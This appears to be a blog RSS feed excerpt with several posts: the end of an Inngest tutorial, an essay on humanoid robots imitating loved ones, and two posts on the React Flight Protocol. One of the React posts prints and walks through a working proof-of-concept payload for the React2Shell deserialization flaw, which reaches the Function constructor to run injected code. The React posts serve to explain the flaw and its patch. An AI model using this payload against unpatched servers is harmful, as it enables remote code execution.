}
</code></pre>
<p>Every time this API route is requested, an event is sent to Inngest. To test it, open <a target="_blank" href="http://localhost:3000/api/hello"><code>http://localhost:3000/api/hello</code> (change your port if your Next</a>.js app is running elsewhere). You should see the following output: <code>{"message":"Event sent!"}</code></p>
<p>If you go back to the Inngest Dev Server, you will see a new run is triggered by this event:</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1769968090377/8e845141-aab2-4d8f-9a8b-9afdad086ed2.png" alt class="image--center mx-auto" /></p>
<p>That’s it you have learned how to create Inngest functions and you have sent events to trigger those functions</p>
]]></content:encoded></item><item><title><![CDATA[Digital Echo - When Humanoid Robots Learn Our Loved One's Essence]]></title><description><![CDATA[The dream of intelligent machines has captivated humanity for centuries. From the earliest automata to the sophisticated androids of science fiction, we've envisioned creations that mirror ourselves, not just in form, but in interaction and intellige...]]></description><link>https://blog.nidhin.dev/digital-echo-when-humanoid-robots-learn-our-loved-ones-essence</link><guid isPermaLink="true">https://blog.nidhin.dev/digital-echo-when-humanoid-robots-learn-our-loved-ones-essence</guid><category><![CDATA[imitationlearning]]></category><category><![CDATA[robotics]]></category><category><![CDATA[Artificial Intelligence]]></category><category><![CDATA[humanoid robot]]></category><category><![CDATA[Machine Learning]]></category><category><![CDATA[Reinforcement Learning]]></category><category><![CDATA[nlp]]></category><category><![CDATA[neural networks]]></category><dc:creator><![CDATA[nidhinkumar]]></dc:creator><pubDate>Sun, 28 Dec 2025 15:04:21 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1766933236902/9ecbf2b0-ca31-493d-b448-c2a020ed6eff.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>The dream of intelligent machines has captivated humanity for centuries. From the earliest automata to the sophisticated androids of science fiction, we've envisioned creations that mirror ourselves, not just in form, but in interaction and intelligence.</p>
<p>Today, this dream is closer to reality than ever, ushering in an era where humanoid robots are not just performing tasks, but learning the very nuances of human behavior. What if this learning could extend to preserving the unique essence of our loved ones, creating digital echoes in a physical form?</p>
<h2 id="heading-from-industrial-arms-to-graceful-giants-the-rise-of-humanoid-robotics">From Industrial Arms to Graceful Giants: The Rise of Humanoid Robotics</h2>
<p>For decades, robots have been synonymous with precision and power on factory floors. But a new generation of robotics is emerging, exemplified by agile machines like the Unitree G1 or Optimus Robot a.k.a Tesla Bots, which can dance, jump, and navigate complex terrains with remarkable fluidity.</p>
<p>Companies like Boston Dynamics have pushed the boundaries of bipedal locomotion, while the synchronized performances of humanoid robots in places like <a target="_blank" href="https://interestingengineering.com/ai-robotics/china-humanoid-robots-dance-chengdu-concert">Chengdu</a> showcase their growing dexterity and coordination. These are no longer just tools, they are the platforms designed for dynamic interaction in human environments.</p>
<p>But what truly unlocks the potential for these robots to integrate into our lives is their ability to <em>learn</em> and <em>adapt</em>. This is where the sophisticated interplay of Artificial Intelligence, particularly <strong>Imitation Learning</strong> and <strong>Reinforcement Learning</strong>, comes into play.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1766931781979/9709fae6-ca93-41f6-a2ce-7136c08456dc.png" alt class="image--center mx-auto" /></p>
<h2 id="heading-the-art-of-mimicry-and-the-science-of-mastery-how-robots-learn-like-us">The Art of Mimicry and the Science of Mastery: How Robots Learn Like Us</h2>
<p>Imagine teaching a robot to make a cup of tea exactly as your grandparent would, with their particular flourish, their specific way of holding the kettle. This isn't just about programming a sequence of steps. it's about capturing a nuanced, human behavior.</p>
<h3 id="heading-imitation-learning-il">Imitation Learning (IL)</h3>
<p><strong>Imitation Learning (IL)</strong>, also known as Learning from Demonstration, is the robot's first step into mimicking human actions. It's akin to a child learning by watching an adult. The robot observes an "expert" (a human) performing a task – perhaps through video recordings, motion capture, or direct physical guidance. It collects a dataset of what the expert sees (the "state" of the world) and what the expert does (the "action" they take). Using this data, the robot trains a predictive model, often a neural network, to map observations directly to actions.</p>
<p>The beauty of imitation learning is its simplicity and speed. It provides a "warm start," quickly giving the robot a baseline of desired behavior. It bypasses the need for the robot to figure things out from scratch, which can be inefficient or even dangerous in the real world. For learning subtle gestures, specific walking gaits, or even characteristic vocal inflections, imitation learning is invaluable.</p>
<p>However, pure imitation has its limits. What happens if the environment changes slightly, or if the robot encounters a situation not explicitly covered in the training data? This is where <strong>Reinforcement Learning (RL)</strong> steps in, elevating the robot from a mimic to a true learner.</p>
<h3 id="heading-reinforcement-learning-rl">Reinforcement Learning (RL)</h3>
<p>Reinforcement Learning is the process of learning through trial and error, guided by a system of rewards. The robot, now an "agent," interacts with its environment, taking actions and receiving feedback in the form of numerical "rewards" or "penalties." Its goal is to discover a "policy" – a strategy that tells it what to do in any given situation to maximize its cumulative reward over time.</p>
<p>Think of it this way: Imitation Learning teaches the robot <em>how</em> to make tea like your grandparent. Reinforcement Learning, layered on top, teaches it <em>to make good tea</em> by experimenting with water temperature, brewing time, or sugar levels, and learning from the resulting "deliciousness" (reward) or "bitterness" (penalty) feedback. It allows the robot to adapt, generalize, and even surpass the original expert's performance by discovering more optimal strategies.</p>
<p>The most advanced systems combine both: Imitation Learning provides a robust initial policy, getting the robot close to expert-level performance. Then, Reinforcement Learning takes over, fine-tuning that policy, allowing the robot to adapt to new situations, personalize its interactions, and continuously improve its performance beyond mere mimicry. This synergy is critical for creating robots that are not just animated dolls, but responsive, evolving entities.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1766931853168/68e37e69-3f24-4e2c-846e-ad0989b3c6c7.png" alt class="image--center mx-auto" /></p>
<h2 id="heading-metadata-of-a-life-crafting-digital-clones">Metadata of a Life: Crafting Digital Clones</h2>
<p>Now, let's push the boundaries of this technology. What if the "expert" data we feed these learning algorithms isn't just a generic demonstration, but the incredibly rich "metadata" of a specific individual – a loved one?</p>
<p>Imagine curating a vast digital archive:</p>
<ul>
<li><p><strong>Speech and Audio:</strong> Recordings of conversations, voice messages, interviews, videos. AI-powered <strong>Natural Language Processing (NLP)</strong> and <strong>Speech Synthesis</strong> could learn their unique vocabulary, sentence structure, tone, rhythm, and even subtle vocal quirks, allowing a robot to speak <em>like</em> them.</p>
</li>
<li><p><strong>Visual Data:</strong> Thousands of photos and videos capturing their facial expressions, body language, gestures, how they walk, how they laugh. <strong>Computer Vision</strong> algorithms could extract these patterns, enabling the robot to animate its face and move its body with their characteristic mannerisms.</p>
</li>
<li><p><strong>Textual Data:</strong> Emails, messages, social media posts, written documents, diaries. This provides insight into their personality, beliefs, sense of humor, and conversational style, which an advanced <strong>Language Model</strong> could learn to emulate.</p>
</li>
<li><p><strong>Behavioral Patterns:</strong> Even data from wearable devices could contribute, hinting at activity levels, sleep patterns, or daily routines, helping to inform a holistic digital profile.</p>
</li>
</ul>
<p>This aggregated "metadata of a life" becomes the blueprint for a <strong>digital clone</strong> – an AI entity trained to capture and express the essence of a person. Integrated into an advanced humanoid robot, this digital clone could manifest as a physical presence.</p>
<h2 id="heading-recent-advancements">Recent Advancements</h2>
<ol>
<li><p>Tesla's Optimus Gen 3 entered factory pilots in late 2025, autonomously sorting batteries and performing up to 100 daily tasks like cooking after learning from videos alone.</p>
</li>
<li><p><a target="_blank" href="https://www.unitree.com/">Unitree</a> G1, at $16,000, debuted in Chinese warehouses for hazardous inspections and healthcare rehab, showcasing dexterous hands for real-time adaptation.</p>
</li>
<li><p><a target="_blank" href="https://www.figure.ai/news/introducing-figure-03">Figure</a> 02 deployed in US manufacturing sites with Mercedes-Benz, using AI vision to manipulate diverse objects in logistics picking tasks. Boston Dynamics' electric Atlas demonstrated RL-trained dynamic maneuvers at the 2025 World Robot Conference in Beijing, aiding disaster simulations.</p>
</li>
<li><p>Agility Robotics' Digit began Amazon warehouse operations worldwide, navigating uneven floors and ramps for tote handling where wheeled robots fail</p>
</li>
<li><p>Unitree G1 performed synchronized dances at Chengdu concerts, highlighting coordination for entertainment uses.</p>
</li>
</ol>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1766931860753/a63ed136-a9ad-4d69-a97c-b777ab1648cc.png" alt class="image--center mx-auto" /></p>
<h3 id="heading-the-future-a-new-frontier-of-connection">The Future: A New Frontier of Connection</h3>
<p>As we stand on the precipice of this "post-biological" age, the integration of digital clones into humanoid bodies isn't just a matter of "when," but "how." We are moving toward a world where the people we love don't just live on in photos or memories, but as interactive, physical companions.</p>
<p>A robot trained on a lifetime of metadata could offer a form of <strong>"Digital Immortality."</strong> It could tell your grandchildren stories about your youth in your own voice, replicate the exact way you tilt your head when you're thinking, and continue to learn and grow alongside your family through Reinforcement Learning.</p>
<h2 id="heading-the-heart-in-the-machine">The Heart in the Machine</h2>
<p>While the technical hurdles—crossing the "Uncanny Valley" and perfecting multi-modal learning—are being cleared at breakneck speed, the true challenge lies in the soul of the endeavor.</p>
<p>As we combine our "dear ones'" metadata with these graceful giants, we must ask ourselves:</p>
<ul>
<li><p><strong>Consent and Legacy:</strong> Who owns the digital echo of a person? Does a "digital twin" have rights, and how do we ensure a loved one’s data is used to honor them, not just mimic them?</p>
</li>
<li><p><strong>The Nature of Grief:</strong> Does having a physical "copy" help us heal, or does it prevent us from letting go?</p>
</li>
<li><p><strong>Authenticity vs. Algorithm:</strong> Can a machine, no matter how well-trained via RL and Imitation, truly capture the "spark" that makes us human, or will it always be a high-fidelity reflection?</p>
</li>
</ul>
<p>The future of humanoid robotics is more than just a leap in engineering, it is a mirrors-edge dance between memory and machinery. As these robots enter our homes, they won't just be tools or entertainers—they will be the vessels for our most precious data: <strong>our identity.</strong></p>
<h2 id="heading-references">References</h2>
<ol>
<li><p>UniTree - <a target="_blank" href="https://www.unitree.com/g1">https://www.unitree.com</a></p>
</li>
<li><p>Figure - <a target="_blank" href="https://www.figure.ai/">https://www.figure.ai/</a></p>
</li>
<li><p>Agility Robotics - <a target="_blank" href="https://www.agilityrobotics.com/solution">https://www.agilityrobotics.com/solution</a></p>
</li>
</ol>
]]></content:encoded></item><item><title><![CDATA[Decoding the Flight Payload in React Server Components]]></title><description><![CDATA[If you’ve worked with React Server Components (RSC), you know the server streams a special payload to the client using the React Flight protocol. At first glance, it looks like harmless serialized data — just chunks that eventually turn into UI.
But ...]]></description><link>https://blog.nidhin.dev/decoding-the-flight-payload-in-react-server-components</link><guid isPermaLink="true">https://blog.nidhin.dev/decoding-the-flight-payload-in-react-server-components</guid><category><![CDATA[React]]></category><category><![CDATA[rsc]]></category><category><![CDATA[JavaScript]]></category><category><![CDATA[react internals]]></category><category><![CDATA[deserialization]]></category><dc:creator><![CDATA[nidhinkumar]]></dc:creator><pubDate>Sun, 21 Dec 2025 15:42:45 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1766337231528/614c8a91-605f-458c-8b68-4da16978ff56.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>If you’ve worked with React Server Components (RSC), you know the server streams a special payload to the client using the React Flight protocol. At first glance, it looks like harmless serialized data — just chunks that eventually turn into UI.</p>
<p>But what if an attacker could inject their own chunks into that stream?</p>
<p>A security researcher, <strong>Lachlan Davidson</strong>, demonstrated that by abusing React’s internal <em>Flight Reviver</em> logic, it’s possible to turn a crafted RSC payload into <strong>arbitrary JavaScript execution on the client</strong>.</p>
<h2 id="heading-1react-server-component">1.React Server Component</h2>
<p>In React Server Component the server actually doesn’t send JavaScript but it sends JSX (React Flight Protocol). In the server we convert the JSX into a React Flight Payload and the client receives the payload deserialize it on the client side and then it gets the HTML out of it</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1766328747890/fd532481-f044-4158-b526-9ab48acade8d.png" alt class="image--center mx-auto" /></p>
<h2 id="heading-2lets-decode-the-payload">2.Let’s Decode the Payload</h2>
<p>Here is the payload which was shared by Lachlan Davidson</p>
<pre><code class="lang-typescript"><span class="hljs-keyword">const</span> payload = {
    <span class="hljs-string">'0'</span>: <span class="hljs-string">'$1'</span>,
    <span class="hljs-string">'1'</span>: {
        <span class="hljs-string">'status'</span>:<span class="hljs-string">'resolved_model'</span>,
        <span class="hljs-string">'reason'</span>:<span class="hljs-number">0</span>,
        <span class="hljs-string">'_response'</span>:<span class="hljs-string">'$4'</span>,
        <span class="hljs-string">'value'</span>:<span class="hljs-string">'{"then":"$3:map","0":{"then":"$B3"},"length":1}'</span>,
        <span class="hljs-string">'then'</span>:<span class="hljs-string">'$2:then'</span>
    },
    <span class="hljs-string">'2'</span>: <span class="hljs-string">'$@3'</span>,
    <span class="hljs-string">'3'</span>: [],
    <span class="hljs-string">'4'</span>: {
        <span class="hljs-string">'_prefix'</span>:<span class="hljs-string">'console.log(7*7+1)//'</span>,
        <span class="hljs-string">'_formData'</span>:{
            <span class="hljs-string">'get'</span>:<span class="hljs-string">'$3:constructor:constructor'</span>
        },
        <span class="hljs-string">'_chunks'</span>:<span class="hljs-string">'$2:_response:_chunks'</span>,
    }
}
</code></pre>
<p>At first by looking at the code you might be thinking is this React. Well this is the payload send by the server to the client in chunks</p>
<p>In React Server Components (RSC), the server sends "chunks" of data to the client. React "revives" these chunks into UI. The vulnerability occurs when an attacker crafts a chunk that looks like a <strong>Promise</strong> (a "Thenable") to trick React's internal parser into executing code.</p>
<h2 id="heading-3breakdown-of-the-payload">3.Breakdown of the Payload</h2>
<h3 id="heading-01-the-entry-point-chunk-0">01. The Entry Point (Chunk 0)</h3>
<p><code>'0': '$1'</code> React starts parsing at Chunk 0. It sees <code>$1</code>, which is a pointer telling React: "Go look at Chunk 1 to find out what I am."</p>
<h3 id="heading-02-the-thenable-trap-chunk-1">02. The "Thenable" Trap (Chunk 1)</h3>
<p>This is where the magic happens. In JavaScript, any object with a <code>.then()</code> method is treated like a Promise.</p>
<ul>
<li><p><code>status: 'resolved_model'</code>: This tells React the "Promise" is already finished and ready to be processed.</p>
</li>
<li><p><code>then: '$2:then'</code>: This tells React to use the <code>.then</code> method found in Chunk 2.</p>
</li>
</ul>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1766331876315/490928f9-243b-403f-9b95-3500477338a8.png" alt class="image--center mx-auto" /></p>
<h3 id="heading-03-the-self-reference-trick-chunk-2-amp-3">03. The Self-Reference Trick (Chunk 2 &amp; 3)</h3>
<p><code>'2': '$@3'</code>, <code>'3': []</code> The <code>$@</code> symbol is a "self-reference." It creates a loop that allows the attacker to grab React's own internal <strong>Chunk Wrapper</strong> object. This wrapper has a built-in function that React uses to process data. By grabbing this, the attacker can now run React’s internal code on their own malicious data.</p>
<h3 id="heading-04-injecting-the-malicious-json">04. Injecting the Malicious JSON</h3>
<p><code>'value':'{"then":"$3:map","0":{"then":"$B3"},"length":1}'</code> Once React starts "resolving" Chunk 1, it parses this string. The <code>$B3</code> is the "nuclear option." The <code>B</code> prefix tells React: "This is a Blob, go fetch it using the <code>_formData.get</code> method."</p>
<h3 id="heading-05-hijacking-the-constructor-chunk-4">05. Hijacking the Constructor (Chunk 4)</h3>
<p>This is the "Pro" move. The attacker redefines what <code>_formData.get</code> actually is:</p>
<ul>
<li><p><code>_formData.get</code>: <code>'$3:constructor:constructor'</code></p>
<ul>
<li><p>Chunk 3 is an array (<code>[]</code>).</p>
</li>
<li><p><code>[].constructor</code> is the <code>Array</code> function.</p>
</li>
<li><p><code>Array.constructor</code> is the global <code>Function</code> object (which works like <code>eval</code>).</p>
</li>
</ul>
</li>
<li><p><code>_prefix</code>: <code>console.log(7*7+1)//</code></p>
<ul>
<li>This is the code to be run. The <code>//</code> is vital because React appends a character at the end. The <code>//</code> comments it out so the code doesn't crash!</li>
</ul>
</li>
</ul>
<p>Without <code>console.log(7*7+1)//</code> the code</p>
<pre><code class="lang-typescript"> <span class="hljs-keyword">return</span> response._formData.get(response._prefix + blobId);
</code></pre>
<p>would execute</p>
<pre><code class="lang-typescript"><span class="hljs-built_in">Function</span>(<span class="hljs-built_in">console</span>.log(<span class="hljs-number">7</span>*<span class="hljs-number">7</span>+<span class="hljs-number">1</span>)<span class="hljs-number">3</span>) <span class="hljs-comment">// Syntax error! '3' is invalid</span>
</code></pre>
<p>With the comment <code>//</code>, it causes no error -</p>
<pre><code class="lang-typescript"><span class="hljs-string">'_prefix'</span>: <span class="hljs-string">'console.log(7*7+1)//'</span>

<span class="hljs-built_in">Function</span>(<span class="hljs-built_in">console</span>.log(<span class="hljs-number">7</span>*<span class="hljs-number">7</span>+<span class="hljs-number">1</span>) <span class="hljs-comment">//3) // 3 is now inside a comment so ignored 🔥</span>
</code></pre>
<h2 id="heading-final-notes">Final Notes</h2>
<p>Well this issues has been reported to Meta by Lachlan Davidson and a patch was provided by the React Team by adding hasOwnProperty <a target="_blank" href="https://github.com/facebook/react/pull/35277/files">https://github.com/facebook/react/pull/35277/files</a> and even more fixes for the same.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1766338864119/b4302340-d57c-4697-bfca-6e1c11723d5d.png" alt class="image--center mx-auto" /></p>
<p>That marks the end of decoding the payload from the Flight protocol. Will catch up in another interesting post soon 😄</p>
]]></content:encoded></item><item><title><![CDATA[React Flight Protocol]]></title><description><![CDATA[The introduction of React Server Components (RSC) marked a paradigm shift in how we build React applications, allowing developers to leverage server-side capabilities directly within their component tree. But how do these server-rendered components c...]]></description><link>https://blog.nidhin.dev/react-flight-protocol</link><guid isPermaLink="true">https://blog.nidhin.dev/react-flight-protocol</guid><category><![CDATA[flightprotocol]]></category><category><![CDATA[reactflightprotocol]]></category><category><![CDATA[React]]></category><category><![CDATA[react server components]]></category><category><![CDATA[React2Shell]]></category><category><![CDATA[Next.js]]></category><category><![CDATA[Vercel]]></category><category><![CDATA[vulnerability]]></category><dc:creator><![CDATA[nidhinkumar]]></dc:creator><pubDate>Sun, 14 Dec 2025 15:04:17 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1765724018558/ee629a35-fb09-4c04-885f-4f02da196d45.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>The introduction of React Server Components (RSC) marked a paradigm shift in how we build React applications, allowing developers to leverage server-side capabilities directly within their component tree. But how do these server-rendered components communicate with the client-side React runtime? The answer lies in the <strong>React Flight Protocol</strong>, a specialized wire format designed to transmit the serialized React element tree from the server to the client.</p>
<p>This post will dive deep into the React Flight Protocol, explaining its structure, how it handles various data types, and why it's a foundational technology for the future of web development.</p>
<h2 id="heading-1client-side-rendering">1.Client-Side Rendering</h2>
<p>For years, React applications predominantly embraced a client-side rendering (CSR) model, where the browser downloaded a large JavaScript bundle, hydrated the DOM, and managed all subsequent UI updates. While powerful, this approach often led to:</p>
<ul>
<li><p><strong>Large JavaScript bundles</strong>: Shipping UI logic, data fetching, and state management to the client.</p>
</li>
<li><p><strong>Waterfall data fetching</strong>: Client components often had to fetch data sequentially, leading to slower perceived load times.</p>
</li>
<li><p><strong>Complex server-side rendering (SSR) hydration</strong>: Reconciling server-generated HTML with client-side React.</p>
</li>
</ul>
<p>React Server Components address these challenges by enabling developers to render components entirely on the server, keeping their code and data fetching logic off the client bundle. The magic that bridges the server and client in this new architecture is the <strong>React Flight Protocol</strong>.</p>
<h2 id="heading-2what-is-react-flight-protocol">2.What is React Flight Protocol?</h2>
<p>At its core, the React Flight Protocol is a <strong>compact, streaming, JSON-like serialization format</strong> specifically designed to represent a React element tree. It's not HTML; it's a <em>description</em> of the UI, including:</p>
<ol>
<li><p><strong>React elements</strong>: The structure of your components (e.g., <code>&lt;div&gt;</code>, <code>&lt;MyComponent&gt;</code>).</p>
</li>
<li><p><strong>Props</strong>: Data passed to components.</p>
</li>
<li><p><strong>Client Component references</strong>: Pointers to client-side code that needs to be loaded and rendered on the browser.</p>
</li>
<li><p><strong>Server Action references</strong>: Pointers to server-side functions that can be invoked from the client.</p>
</li>
</ol>
<p>Crucially, the Flight Protocol allows React to send only the <em>necessary instructions</em> to the client. Server-only code, sensitive data, and large dependencies stay on the server, resulting in significantly smaller client-side bundles and improved performance.</p>
<h2 id="heading-3react-flight-protocol-vs-react-server-components-protocol-a-clarification"><strong>3.React Flight Protocol vs. React Server Components Protocol: A Clarification</strong></h2>
<p>It's common to hear both "React Flight Protocol" and "React Server Components Protocol" used interchangeably. To be precise:</p>
<ul>
<li><p><strong>React Server Components (RSC)</strong> is the <em>feature</em> that allows you to write components that render exclusively on the server, with zero client-side JavaScript.</p>
</li>
<li><p>The <strong>React Flight Protocol</strong> is the <em>underlying technical specification and wire format</em> that enables RSCs to function. It's the language the server and client speak to exchange UI updates.</p>
</li>
</ul>
<p>Therefore, there isn't a separate, distinct "React Server Components Protocol." When people refer to it, they are almost certainly referring to the React Flight Protocol itself. The Flight Protocol <em>is</em> the protocol used by Server Components.</p>
<h2 id="heading-4how-react-flight-protocol-works-under-the-hood"><strong>4.How React Flight Protocol Works Under the Hood</strong></h2>
<p>The Flight Protocol is a stream of instructions and data. Unlike a single HTTP response that delivers a complete HTML page or a JSON API payload, the Flight stream can deliver parts of the UI as they are ready, interweaving different types of information.</p>
<h3 id="heading-the-streamable-interleaved-format"><strong>The Streamable, Interleaved Format</strong></h3>
<p>The protocol uses a custom, line-delimited format where each line typically starts with a single character indicating the type of instruction, followed by an ID and then the associated data. This allows the client to parse and process the stream incrementally.</p>
<p>Common instruction types include:</p>
<ul>
<li><p><code>J</code>: JSON data (e.g., props, element structures).</p>
</li>
<li><p><code>M</code>: Module reference (for Client Components).</p>
</li>
<li><p><code>A</code>: Asynchronous instruction (e.g., for Suspense boundaries).</p>
</li>
<li><p><code>S</code>: Symbol reference (e.g., <code>$$typeof</code> for React elements).</p>
</li>
<li><p><code>R</code>: Root element.</p>
</li>
</ul>
<h3 id="heading-serializing-components-and-elements"><strong>Serializing Components and Elements</strong></h3>
<p>When a Server Component renders, its JSX output is not converted to HTML. Instead, it's serialized into a JSON-like representation. For example, a simple <code>&lt;div&gt;Hello&lt;/div&gt;</code> might be represented as <code>["$","div",null,{"children":"Hello"}]</code>.</p>
<p>The <code>$</code> prefix is a convention for special React elements. <code>$$typeof</code> symbols, which React uses internally to distinguish different types of elements (like <code>REACT_ELEMENT_TYPE</code>, <code>REACT_SERVER_COMPONENT_TYPE</code>), are also serialized efficiently.</p>
<h3 id="heading-client-references-module-references"><strong>Client References (Module References)</strong></h3>
<p>This is where the magic of integrating server and client components happens. When a Server Component renders a Client Component, the client component's code is <em>not</em> sent over the Flight Protocol. Instead, the server sends a <strong>reference</strong> to the client component's module.</p>
<p>The <code>M</code> instruction is used for this. It maps an arbitrary ID to a specific client component module. The client-side React runtime then uses this ID to dynamically import the actual JavaScript module for that component.</p>
<p>The reference format often looks like <code>["$","M",&lt;id&gt;,null,&lt;props&gt;]</code>, where <code>&lt;id&gt;</code> refers to a module previously defined in the stream (e.g., <code>M1: {"id":"./path/to/ClientComponent.js#default"}</code>).</p>
<h3 id="heading-data-serialization-and-hydration"><strong>Data Serialization and Hydration</strong></h3>
<p>The Flight Protocol efficiently serializes various data types, including primitive values, arrays, and objects. It can also handle more complex types like Promises, allowing Suspense boundaries to work seamlessly across the server-client divide.</p>
<p>The client-side React runtime reads this stream, reconstructs the React element tree, and then renders it. When a client component is referenced, the runtime fetches its JavaScript bundle, instantiates it, and hydrates it with the props received from the server.</p>
<h3 id="heading-5the-wire-format-structure-payload-examples"><strong>5.The Wire Format Structure (Payload Examples)</strong></h3>
<p>Let's illustrate with a simple example. Imagine a Server Component (<code>Page</code>) that renders a Client Component (<code>ClientButton</code>).</p>
<pre><code class="lang-typescript"><span class="hljs-comment">// app/page.tsx (Server Component)</span>
<span class="hljs-keyword">import</span> ClientButton <span class="hljs-keyword">from</span> <span class="hljs-string">'./ClientButton'</span>; <span class="hljs-comment">// This is a Client Component</span>

<span class="hljs-keyword">export</span> <span class="hljs-keyword">default</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">Page</span>(<span class="hljs-params"></span>) </span>{
  <span class="hljs-keyword">const</span> message = <span class="hljs-string">"Hello from Server!"</span>;
  <span class="hljs-keyword">return</span> (
    &lt;div&gt;
      &lt;h1&gt;{message}&lt;/h1&gt;
      &lt;ClientButton text=<span class="hljs-string">"Click me!"</span> /&gt;
    &lt;/div&gt;
  );
}

<span class="hljs-comment">// app/ClientButton.tsx (Client Component)</span>
<span class="hljs-string">'use client'</span>; <span class="hljs-comment">// This directive marks it as a Client Component</span>
<span class="hljs-keyword">import</span> { useState } <span class="hljs-keyword">from</span> <span class="hljs-string">'react'</span>;

<span class="hljs-keyword">export</span> <span class="hljs-keyword">default</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">ClientButton</span>(<span class="hljs-params">{ text }: { text: <span class="hljs-built_in">string</span> }</span>) </span>{
  <span class="hljs-keyword">const</span> [count, setCount] = useState(<span class="hljs-number">0</span>);
  <span class="hljs-keyword">return</span> (
    &lt;button onClick={<span class="hljs-function">() =&gt;</span> setCount(count + <span class="hljs-number">1</span>)}&gt;
      {text} Count: {count}
    &lt;/button&gt;
  );
}
</code></pre>
<p>When the <code>Page</code> Server Component is requested, the server might send a Flight Protocol payload similar to this <strong>(simplified and illustrative)</strong>:</p>
<pre><code class="lang-typescript">J0: [<span class="hljs-string">"$"</span>,<span class="hljs-string">"div"</span>,<span class="hljs-literal">null</span>,{<span class="hljs-string">"children"</span>:[[<span class="hljs-string">"$"</span>,<span class="hljs-string">"h1"</span>,<span class="hljs-literal">null</span>,{<span class="hljs-string">"children"</span>:<span class="hljs-string">"Hello from Server!"</span>}],[<span class="hljs-string">"$"</span>,<span class="hljs-string">"M"</span>,<span class="hljs-number">1</span>,<span class="hljs-literal">null</span>,{<span class="hljs-string">"text"</span>:<span class="hljs-string">"Click me!"</span>}]]}]
M1: {<span class="hljs-string">"id"</span>:<span class="hljs-string">"./app/ClientButton.tsx#default"</span>}
</code></pre>
<p>Let's break this down:</p>
<ol>
<li><p><code>J0: ...</code>: This is a JSON instruction (<code>J</code>) with ID <code>0</code>. It describes the root React element structure.</p>
<ul>
<li><p><code>["$","div",null,...]</code>: Represents a <code>div</code> element.</p>
</li>
<li><p><code>"children": [...]</code>: An array of children.</p>
</li>
<li><p><code>["$","h1",null,{"children":"Hello from Server!"}]</code>: The <code>h1</code> element with its text.</p>
</li>
<li><p><code>["$","M",1,null,{"text":"Click me!"}]</code>: This is the crucial part. It's an instruction to render a <strong>module reference</strong> (<code>M</code>) with ID <code>1</code>. The <code>null</code> is for the key, and <code>{"text":"Click me!"}</code> are the props passed to the <code>ClientButton</code>.</p>
</li>
</ul>
</li>
<li><p><code>M1: {"id":"./app/ClientButton.tsx#default"}</code>: This is a Module instruction (<code>M</code>) with ID <code>1</code>. It tells the client that whenever it encounters a reference to module <code>1</code>, it should import the <code>default</code> export from <code>./app/ClientButton.tsx</code>.</p>
</li>
</ol>
<p>The client-side React runtime receives this stream. It sees the <code>div</code> and <code>h1</code> elements and renders them. When it encounters <code>["$","M",1,...]</code>, it looks up module <code>1</code>, dynamically imports <code>./app/ClientButton.tsx</code>, and then renders <code>ClientButton</code> with the provided <code>text</code> prop. The <code>ClientButton</code>'s interactivity (the <code>useState</code> hook) is handled purely on the client.</p>
<h2 id="heading-6the-react2shell-security-vulnerability"><strong>6.The React2Shell Security Vulnerability</strong></h2>
<p>While the Flight Protocol was designed to be a secure serialization format, December 2025 revealed a critical flaw in its implementation, now widely known as <strong>React2Shell</strong>. This vulnerability (CVE-2025-55182) carries a maximum severity score of <strong>CVSS 10.0</strong>, highlighting that even robust protocols can suffer from implementation defects.</p>
<h3 id="heading-what-is-react2shell">What is React2Shell?</h3>
<p>React2Shell is an <strong>Insecure Deserialization</strong> vulnerability inherent to the React Server Components (RSC) "Flight" protocol implementation itself (specifically in the <code>react-server-dom-*</code> packages). Unlike previously thought, this is not just about user data; the vulnerability lies in how the React server runtime deserializes the stream of component instructions.</p>
<h3 id="heading-how-it-works"><strong>How it Works</strong></h3>
<p>The Flight Protocol uses special prefixes (like <code>$</code>, <code>@</code>, and <code>$F</code>) to denote different data types (references, promises, symbols). The vulnerability exploits the <code>reviveModel</code> function—the internal mechanism React uses to reconstruct the component tree on the server.</p>
<ol>
<li><p><strong>The Attack:</strong> An attacker sends a maliciously crafted HTTP request containing a Flight stream with specific polluted prototypes or referencing internal gadgets (using the <code>$@</code> chunk type).</p>
</li>
<li><p><strong>The Execution:</strong> Because the parser failed to properly validate these keys against the object's own properties, the server blindly deserializes the payload.</p>
</li>
<li><p><strong>The Result:</strong> This triggers Remote Code Execution (RCE), allowing the attacker to run arbitrary shell commands on the server without any authentication.</p>
</li>
</ol>
<p><strong>The December 11, 2025 Update</strong> Following the initial disclosure, further scrutiny by the security community revealed two additional vulnerabilities in the same subsystem, addressed in the December 11th security patch:</p>
<ul>
<li><p><strong>CVE-2025-55184 (DoS):</strong> A high-severity flaw where crafted requests can trap the server in an infinite loop, causing a Denial of Service.</p>
</li>
<li><p><strong>CVE-2025-55183 (Source Disclosure):</strong> A medium-severity issue that could trick the server into returning the compiled source code of Server Actions, potentially leaking business logic.</p>
</li>
</ul>
<p><strong>Mitigation and Best Practices</strong> The only effective mitigation for React2Shell is to <strong>patch immediately</strong>.</p>
<ul>
<li><p><strong>Upgrade Essential Packages:</strong> Ensure <code>next</code> is upgraded to <strong>15.1.11+</strong> or <strong>14.2.35+</strong> (for older versions). If you are using raw React 19, ensure <code>react-server-dom-webpack</code> is version <strong>19.0.1+</strong>.</p>
</li>
<li><p><strong>Audit Dependencies:</strong> Check for any third-party libraries or internal tools that might be bundling older versions of the RSC renderer.</p>
</li>
<li><p><strong>Least Privilege:</strong> Ensure your Node.js server process runs with the absolute minimum permissions required, limiting the blast radius should an RCE occur.</p>
</li>
</ul>
<h2 id="heading-conclusion">Conclusion</h2>
